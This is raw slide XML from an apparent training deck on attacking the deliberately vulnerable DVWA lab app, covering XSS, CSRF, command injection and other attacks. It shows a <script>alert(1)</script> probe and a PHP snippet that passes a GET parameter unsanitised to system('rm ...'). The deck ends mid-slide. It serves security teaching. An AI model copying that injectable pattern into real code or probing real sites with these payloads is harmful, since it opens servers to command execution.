              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>BRUTE FORCE ATTACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>COMMAND INJECTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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1295801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Damn Vulnerable Web Application (DVWA)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="TryHackMe | DVWA">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B849FE-E1DB-4AC9-05C0-C3E14AD5A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668" y="2053985"/>
            <a:ext cx="2143817" cy="16225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FB24D3-04EE-69C9-4481-873CE732154B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408389" y="4106651"/>
            <a:ext cx="5060373" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" dirty="0"/>
              <a:t>192.168.0.57</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936714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8877758-0130-4B47-B37B-2645E0648265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6096000" y="962350"/>
            <a:ext cx="5699359" cy="3746492"/>
            <a:chOff x="756138" y="1100479"/>
            <a:chExt cx="4896746" cy="1417718"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2947E2A2-80C5-4050-946D-2423EA7FB990}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="756138" y="1100479"/>
              <a:ext cx="1292103" cy="454219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="7200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E97F1F-60CF-46F5-A856-4F4172FF2478}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1811613" y="1140337"/>
              <a:ext cx="3841271" cy="1377860"/>
              <a:chOff x="941175" y="1212130"/>
              <a:chExt cx="3841271" cy="1377860"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEF3D05-DBED-477E-AB55-60CAC33E919F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="941175" y="1212130"/>
                <a:ext cx="3841271" cy="1015663"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-MY" altLang="ko-KR" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>DAMN VULNERABLE WEB APPLICATION (DVWA)</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED9CA4B-818D-4FC2-B606-12A65F5454AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1134606" y="1454249"/>
                <a:ext cx="3647840" cy="1135741"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>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Introduction to DVWA</a:t>
                </a:r>
              </a:p>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Brute-force attack</a:t>
                </a:r>
              </a:p>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Cross site Request Forgery (CSRF)</a:t>
                </a:r>
              </a:p>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File Upload</a:t>
                </a:r>
              </a:p>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Cross-Site Scripting (XSS) attack</a:t>
                </a:r>
              </a:p>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Command injection attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="171459" indent="-171459">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>SQL injection attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="171459" indent="-171459">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC30F1BB-9F78-B02A-03A6-D21E4A04162C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247325" y="1100849"/>
            <a:ext cx="5320937" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 Modules</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7188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CROSS SITE REQUEST FORGERY (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1414517"/>
            <a:ext cx="10920844" cy="1287532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OBJECTIVE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Demonstrate how an attacker can perform unauthorized actions on a web application by exploiting a user’s authenticated session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="CSRF (Low-Security) | DVWA Writeup | by xBBSec | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454079EB-09A5-DCF3-6D1E-3CBD73A61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3890" y="3027454"/>
            <a:ext cx="6429375"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385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XSS ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE033C89-2A30-D50E-1DF6-7C04BD249654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041898" y="2915830"/>
            <a:ext cx="8748022" cy="3424100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF0460A-78E3-7842-F0AF-28096CE824E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2401201" y="1178207"/>
            <a:ext cx="8029416" cy="1623172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1119069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XSS ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD4E07D-A92E-9C9C-C745-EA30689F0E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108063" y="1718225"/>
            <a:ext cx="4544834" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>What if we enter &lt;script&gt;alert(1)&lt;/script&gt; ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F13A786-108E-42B0-5D8C-76BCB6A83B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2450062"/>
            <a:ext cx="3586480" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Hello &lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>&lt;/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="642830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XSS ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE8CD63-9946-DBB1-9965-EC5808B72C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539620" y="1130429"/>
            <a:ext cx="11112759" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User accounts can be hijacked, credentials could be stolen, sensitive data could be exfiltrated, and lastly, access to your client computers can be obtained.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238A4433-AF64-A062-D2F3-1BCB31938E06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122291" y="2303492"/>
            <a:ext cx="5975671" cy="3314772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2323575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2E666-2F1A-3F7B-4E3F-3B130AF3DC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93724FD-B54B-DE12-ED73-7E2C93131CF6}"/>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1DDE521A-BAFB-0E2E-950A-9E023DA9F4DE}"/>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Damn Vulnerable Web Application (DVWA)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="TryHackMe | DVWA">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2FE6EA-E191-0CE5-F048-23F9663E24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668" y="2053985"/>
            <a:ext cx="2143817" cy="16225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D80D41-43DC-0447-8F9A-B22AFE239CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408389" y="4106651"/>
            <a:ext cx="5060373" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" dirty="0"/>
              <a:t>192.168.0.57/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3421629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COMMAND INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1479876"/>
            <a:ext cx="10920844" cy="1287532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS command injection is also known as shell injection. It allows an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15005D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute operating system (OS) commands on the server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that is running an application, and typically fully compromise the application and its data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A975FAC2-B403-FDDA-B704-ABE67ADE2D5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930163" y="3274985"/>
            <a:ext cx="10016830" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/delete.php?filename=file.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>['filename'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= "rm $filename";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17259C7F-E89E-01B4-6F8A-88A2311982E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930163" y="5178069"/>
            <a:ext cx="9307887" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
